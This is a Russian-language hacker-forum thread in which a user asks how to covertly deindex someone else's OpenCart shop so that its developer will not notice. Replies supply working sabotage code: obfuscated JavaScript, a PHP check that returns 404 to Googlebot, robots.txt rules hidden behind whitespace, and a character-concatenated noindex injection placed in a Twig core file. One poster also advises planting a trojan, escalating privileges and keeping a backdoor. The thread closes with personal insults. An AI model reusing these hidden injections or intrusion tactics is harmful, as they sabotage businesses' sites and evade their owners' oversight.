Как скрыть html код в опенкарте

Discussion in 'PHP' started by BESTia, 6 Jul 2017.

  1. BESTia

    BESTia New Member

    Joined:
    8 Feb 2010
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Всем привет!
    Надо вставить <meta name="" content=""/> в шаблон опенкарта (tpl) таким образом, чтобы это не особо палилось в шаблоне.
    Подскажите, как реализовать?
     
  2. bologer

    bologer Member

    Joined:
    25 Nov 2016
    Messages:
    62
    Likes Received:
    18
    Reputations:
    3
    Чтобы при чтении tpl шаблона не особо было видно что там есть meta тэг? Там JS использовать можно?


    Можешь так поуродствовать :)

    HTML:
    <script>var yandexLabs = function() {var i = 'm',d = 't',k = 'a',o= 'n',html = 'e';document.write('<'+(i+html+d+k) + ' '+ (o+k+i+html)+'="123" co'+n+'t'+ html+'nt="33"/>');};yandexLabs();</script>
     
    #2 bologer, 6 Jul 2017
    Last edited: 6 Jul 2017
  3. BESTia

    BESTia New Member

    Joined:
    8 Feb 2010
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Не помогло. Страницы в индексе. Есть еще варианты?:)
     
  4. BESTia

    BESTia New Member

    Joined:
    8 Feb 2010
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Ребята, неужели ни у кого нет идей и никто не может помочь?)
     
  5. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    добавить реплейс в классы фреймворка
     
  6. barnaki

    barnaki Elder - Старейшина

    Joined:
    2 Nov 2008
    Messages:
    676
    Likes Received:
    140
    Reputations:
    4
    какого результата надо добиться ? спрятать html Не в tpl ? полюбому есть функция которая дерагет этот назовем его prepareTemplate и берет его. вот в ней и сконкотинируй то что тебе надо. просто непонятно что надо сделать. один хер в системе контроля верссий все будет как на ладони. а нет так потом веракод не пропустит.
     
    BESTia likes this.
  7. BESTia

    BESTia New Member

    Joined:
    8 Feb 2010
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Надо закрыть сайт от индексации нестандартным методом - так чтобы это было максимально не заметно. Так чтобы программист, который ищет <meta name="robots" content="noindex,follow" /> или
    User-agent: *
    Disallow: /
    не заметил этого
     
  8. BESTia

    BESTia New Member

    Joined:
    8 Feb 2010
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    Надо спрятать html код в tpl файл, закрыть сайт от индексации максимально незаметно
     
  9. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Code:
    User-agent: *
    Disallow: /
    Эти настройки только для .htaccess и для конфигов веб-сервера. Но! Можно нагуглить класс определения роботов (https://support.google.com/webmasters/answer/1061943?hl=ru), либо где нибудь в одном из инициализирующих классов запилить строчку типа
    Code:
    if(preg_match($_SERVER['HTTP_USER_AGENT'], 'Googlebot')) {
    header("HTTP/1.0 404 Not Found");
    }
    
    Вот еще полезная инфа:
    https://serverfault.com/questions/201035/how-to-block-googlebot-quickly
    https://stackoverflow.com/questions/19337662/blocking-all-bots-except-a-few-with-nginx
     
    #9 b3, 4 Aug 2017
    Last edited: 4 Aug 2017
  10. BESTia

    BESTia New Member

    Joined:
    8 Feb 2010
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0

    Подскажите, это надо запихнуть в библиотеку, типа functions.php?
     
  11. Gar|k

    Gar|k Moderator

    Joined:
    20 Mar 2009
    Messages:
    1,166
    Likes Received:
    266
    Reputations:
    82
    _________________________
    barnaki likes this.
  12. barnaki

    barnaki Elder - Старейшина

    Joined:
    2 Nov 2008
    Messages:
    676
    Likes Received:
    140
    Reputations:
    4
    тут смотря на сколько надо убрать сайт из индексации(сами сроки). ты же понимаешь что они скорее всего не настолько безумны чтобы не иметь резервной копии откуда можно откатиться ? если речь идет о диверсии то я бы первом делом повысил привилегии и внедрил трояна. а дальше уже мигрировал в процесс какой нить системный а не парился а палеве. подключался бы каждый день и записывал . один фиг все эти торговцы шортами не потянут нормальное расследование инцедента. пока они это решат можно не париться о палеве довольно долгое время и тупо менять исходники. практика показывает что в таком случае как правило убивают сервер и переезжают на другой через некоторое время обновив систему . но я бы дал минимум месяц с того момента как они это заметят. а если сныкать код довольно глубоко то они вообще могут никогда не понять что происходит. ибо средств очень частно у них нет .
    ps я помню на ондой фирме работал. там похакали магенту на поддержке. и весь мобильный трафик напрявляли куда то в европу. так вот они так и не нашли денег на расследование и забавно было то что система очень сложная и как ее заново поднять с 0 на сервере док не было. руководство обосралось сказать это компании которой принадлежай сайт и они ВНИМАНИЕ !!! ЗАПИЛИЛИ ТРИГЕР В МУСКУЛЕ КОТОРЫЙ ЧИСТИТ ЗЛОВРЕД В БАЗЕ . причем сам по себе зловред и ныне там и никто не может его найти и переехать никто не может потому что страшно сказать что все просрали а там хватает и солр и hidhload и тд. костылями там весь сервер утыкан.
    как то так короче.не парься. сделай себе вход и развлекайся.
     
    crlf likes this.
  13. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Господи что ты морозишь, Экспертный Эксперт... Какие строки? Из ПС убирают ключевые слова из титула тем самым выбивая сайт из ПС по позициям. И пусть у тебя хоть 300 бэкапов для того чтоб вернуть позиции нужно время а с учетом характера ПС ты можешь их не вернуть если твой сайт не стабилен.
     
  14. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    А tpl выложить сюда не вариант? Или считаете, что тут каждый второй держит шоп на опенкарт? :)

    В каком индексе? Baidu, Duckduckgo?

    Идей хоть отбавляй, но только на правильно заданные вопросы.

    Ага, раз надцать, чтоб наверняка :)

    Правильно пишет @barnaki, спалится это быстро. Даже если нет системы контроля, то как только начнёт проседать траф, а соответственно и профит с шопа, нормальный админ полезет в метрики ПС и сразу поймёт что идёт не так. Соответственно, получится лишь немного поднасрать, да и только.

    Не буду учить морали, типа не рой другому яму и т.п. Предположим, что падлим шопу, который продаёт в сексуальное рабство пентестеров-геев :)

    Как тут уже предлагалось, при локальном вмешательстве, одними из менее заметных вариантов, являются:


    1. Заголовок 404 для роботов.
    2. Disallow в robots.txt.
    3. Мета тег robots в HTML.


    По первому, как я понял, уровень знаний PHP на уровне "запихнуть в библиотеку, типа functions.php". Значит этот вариант отметаем, т.к. тут требуется грамотный подход, как с точки зрения кодинга, так и подбора факторов для определения роботов ПС. Одним определением юзер-агента не отделаешься, т.к. они и под простыми UA ходят.


    Второй вариант, тут ничего сложного, если robots.txt используется, то добавляем:
    Code:
    [тут легитимное содержание]
    ...
    [куча переносов строк]
    ...
    [много-много табуляции] User-agent: *
    [много-много табуляции] Disallow: /
    ...
    [куча переносов строк]
    ...
    

    Третий, если делать как предлагал @b3, будет жить до первого обновления CMS или пока не спалят. Для этого потребуется добавить код:
    PHP:
    if(isset($context['h'.'e'.'a'.'d'.'e'.'r'])){$context['h'.'e'.'a'.'d'.'e'.'r'] = str_replace('<h'.'e'.'a'.'d>','<h'.'e'.'a'.'d>'.str_repeat(chr(9), 130 770).'<'.'m'.'e'.'t'.'a'.' '.'n'.'a'.'m'.'e'.'='.'"'.'r'.'o'.'b'.'o'.'t'.'s'.'"'.' '.'c'.'o'.'n'.'t'.'e'.'n'.'t'.'='.'"'.'n'.'o'.'i'.'n'.'d'.'e'.'x'.','.'n'.'o'.'f'.'o'.'l'.'l'.'o'.'w'.'"'.'>',$context['h'.'e'.'a'.'d'.'e'.'r']);}

    В функцию displayWithErrorHandling, которая расположена в файле ./system/library/template/Twig/Template.php. Добавлять нужно до этой строки:
    PHP:
    ... СЮДА ...
    $this->doDisplay($context$blocks);


    Должно получится примерно так:
    PHP:
      protected function displayWithErrorHandling(array $context, array $blocks = array())
      {
      try {
      if(isset(
    $context['h'.'e'.'a'.'d'.'e'.'r'])){$context['h'.'e'.'a'.'d'.'e'.'r'] = str_replace('<h'.'e'.'a'.'d>','<h'.'e'.'a'.'d>'.str_repeat(chr(9), 130 770).'<'.'m'.'e'.'t'.'a'.' '.'n'.'a'.'m'.'e'.'='.'"'.'r'.'o'.'b'.'o'.'t'.'s'.'"'.' '.'c'.'o'.'n'.'t'.'e'.'n'.'t'.'='.'"'.'n'.'o'.'i'.'n'.'d'.'e'.'x'.','.'n'.'o'.'f'.'o'.'l'.'l'.'o'.'w'.'"'.'>',$context['h'.'e'.'a'.'d'.'e'.'r']);}
      
    $this->doDisplay($context$blocks);
      } catch (
    Twig_Error $e) {
      if (!
    $e->getTemplateFile()) {
      
    $e->setTemplateFile($this->getTemplateName());
      }
      
    // this is mostly useful for Twig_Error_Loader exceptions
      // see Twig_Error_Loader
      
    if (false === $e->getTemplateLine()) {
      
    $e->setTemplateLine(-1);
      
    $e->guess();
      }
      throw 
    $e;
      } catch (
    Exception $e) {
      throw new 
    Twig_Error_Runtime(sprintf('An exception has been thrown during the rendering of a template ("%s").'$e->getMessage()), -1$this->getTemplateName(), $e);
      }
      }
     
    #14 crlf, 8 Aug 2017
    Last edited: 8 Aug 2017
    t0ma5 likes this.
  15. barnaki

    barnaki Elder - Старейшина

    Joined:
    2 Nov 2008
    Messages:
    676
    Likes Received:
    140
    Reputations:
    4
    знаете уважаемый. я конечно понимию что вы великий хакер. но я вас уверяю весь мир давно имеет жопу с закаулками. 1 раз меняешь ? вы слышали хоть про системы контроля версий в которых все видно как на ладони ? git там ? svn mercurial ? нет ? ну поменяешь ты что то . я этот комит увижу все исправлю если речь идет о системе разраба. или araxis merge заюзаю и сравню то что лежит на сервере с тем что в репозитории. потом подниму на свежем сервере в облаке . сделаю apt-get update upgrade. и накачу security path на саму цмс. и все . будешь ты не экспертный эксперт курить в стороне и жалеть в том что спалился и даже входа себе не сделал.
    первое что стоит сделать это обеспечить себе вход на будущее на случай если через неделю они накатят патч безопасности. и сныкаться куда то.(и в случае цмс это почти всегда можно сделать через базу,потому что они часто хранят свой контент страниц в базе(почти всегда) правда в php7 это сложнее если не невозможно., потому что именно база мигрирует между серверами") а потом уже заниматься тем что тебе надо от системы. и "несу" я именно это. это станрадртная практика для ceh . так что учите мат часть.
     
    #15 barnaki, 9 Aug 2017
    Last edited: 9 Aug 2017
  16. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Экспертный эксперт, а как ты вернешь страницы обратно в ПС после потери позиций? Я думаю нет смысла спортить с мусором у которого опыт только в диванной аналитике. К примеру я хекал крупные проекты, бывало даже ОЧЕНЬ крупные и скажу по своему опыту что обнаружить вторжение могут в короткие сроки очень в редких случаях. Хотя везде стоят и гиты и хуиты и самопальные ids и не самопальные и еще вагон и телега разных систем а в итоге все сводится к одному что 24/7 никто не пялится в логи. Я таких как ты сносителей зловредных кодов e6у уже лет под 15, поэтому если ты хотел меня как то обломать то единственное что у тебя вышло это развеселить меня. Я бы посмотрел на клоуна который систему лечит через update или как этот клоун сесурити пач кладет на 0дей дырку на которую нет патча еще... Боже на что я трачу время, я же сюда не заходил примерно год потому как знал что с ебланами не о чем тут тереть... В общем удачи вам там с вашими гитами, чекайте их, устраивайтесь в гуглы сисурити аналитиками, становитесь успешными а я пошел по своим делам)
     
  17. barnaki

    barnaki Elder - Старейшина

    Joined:
    2 Nov 2008
    Messages:
    676
    Likes Received:
    140
    Reputations:
    4
    ну ты и чмо :) максимум что ты можешь так это свою руку. и разговариваешь как чмо и несешь бред. максимум что ты хакал это торговцев бараниной. хакер великий. имел я тебя и твое ламерское мнение. всех хакают и у всех бывают факапы. если бы ты дальше дивана сам дошел бы в этой жизни то знал бы что 100% uptime не бывает даже в теории. даже у гугла бывают фейлы. ничего ты не хакал приличного потому что по тому что ты говоришь виден твой подход и твое ламерское мнение. и потому думаешь что все так просто. на ... иди дурачок. меня похакай попробуй если такой крутой ? не можешь ? ну так иди на ... и все. 0-day у него. где ты а где 0-day нормальный о котором никто не знает. или ты думаешь что ты один знаешь где их купить . лошара . меня похакай. а не можешь так иди подрочи. жены или девушки у тебя все = нет наверняка.
    а вот я тебя хакать не стану. потому что у тебя говнюка ничего интересного нет. :) . и время мое дороже стоит чем то что у тебя даже теоретически может быть. хакер ))))))))))) уморил . где ты а где хакеры овощ.
    твоя практика стоит .. блин она вообще ничего не стоит. ты слаб и бесполезен
     
    #17 barnaki, 10 Aug 2017
    Last edited: 10 Aug 2017